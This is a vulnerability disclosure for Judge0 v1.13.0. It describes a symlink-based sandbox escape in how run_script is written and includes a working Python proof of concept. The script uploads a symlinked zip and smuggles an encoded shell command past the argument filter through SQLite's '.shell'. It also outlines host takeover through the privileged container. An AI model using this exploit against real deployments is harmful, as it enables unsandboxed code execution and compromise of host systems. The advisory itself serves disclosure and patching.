Summary

The application does not account for symlinks placed inside the sandbox directory, which can be leveraged by an attacker to write to arbitrary files and gain code execution outside of the sandbox.

Details

When executing a submission, Judge0 writes a run_script to the sandbox directory as demonstrated in the following code snippet:

    unless submission.is_project
      # gsub is mandatory!
      command_line_arguments = submission.command_line_arguments.to_s.strip.encode("UTF-8", invalid: :replace).gsub(/[$&;<>|`]/, "")
      File.open(run_script, "w") { |f| f.write("#{submission.language.run_cmd} #{command_line_arguments}")}
    end

View this source on Github here.

The security issue is that an attacker can create a symbolic link (symlink) at the path run_script before this code is executed, resulting in the f.write writing to an arbitrary file on the unsandboxed system.

An attacker can leverage this vulnerability to overwrite scripts on the system and gain code execution outside of the sandbox.

PoC

1. Download Judge0:

   wget https://github.com/judge0/judge0/releases/download/v1.13.0/judge0-v1.13.0.zip
   unzip judge0-v1.13.0.zip
   cd judge0-v1.13.0

2. Start Judge0 locally:

   docker compose up -d --force-recreate

3. Run the following python script to exploit the vulnerability:

   #!/usr/bin/env python3
   import requests
   import io
   import zipfile
   import base64
   import stat
   TARGET = "https://localhost:2358"
   # Command to run outside of isolated environment
   CMD = "touch /tmp/poc" # Create file inside tmp folder of docker container to show that isolate was escaped
   # Create zipfile in memory
   zip_buffer = io.BytesIO()
   with zipfile.ZipFile(zip_buffer, "a", zipfile.ZIP_DEFLATED, False) as zip_file:
       # Add symlink to zipfile. The symlink is called "run" and points to "/usr/local/bin/isolate"
       symlink_file = zipfile.ZipInfo("run")
       symlink_file.create_system = 3
       unix_st_mode = stat.S_IFLNK | stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR | stat.S_IRGRP | stat.S_IWGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH
       symlink_file.external_attr = unix_st_mode << 16
       zip_file.writestr(symlink_file, '/usr/local/bin/isolate')
   # To avoid running into issues with the filter, we will encode the command inside python
   hex_payload = CMD.encode().hex()
   encoded_command = 'python3 -c __import__("os").system(bytes.fromhex("{}").decode())'.format(hex_payload)
   encoded_command = encoded_command.replace("(","\\\\(").replace(")","\\\\)").replace('"','\\\\"')
   # Submit the zipfile to the server.
   print(requests.post(
       TARGET + "/submissions?wait=true",
       json={
           "source_code": "NOT IMPORTANT",
           "language_id": 82, # SQLite
           "additional_files": base64.b64encode(zip_buffer.getvalue()).decode(),
           "command_line_arguments": f"-cmd '.shell {encoded_command}'"
       },
   ).json()['stdout'])

4. The command touch /tmp/poc will have been executed outside of the sandbox. To confirm this, run the following command:

   docker compose exec server ls -l /tmp
   

Impact

An attacker can use this vulnerability to gain unsandboxed code execution on the Docker container running the submission job.

Additionally, the attacker may then escalate their privileges outside of the Docker container due to the Docker container being run using the privileged flag as specified in docker-compose.yml. This will allow the attacker to mount the Linux host filesystem and the attacker can then write files (for example a malicious cron job) to gain access to the system.

From this point the attacker will have complete access to the Judge0 system including the database, internal networks, the Judge0 webserver, and any other applications running on the Linux host.

Timeline

The bug was reported to maintainers on 4/3/2024. A patch was deployed on 6/3/2024, and a second one on 7/3/2024.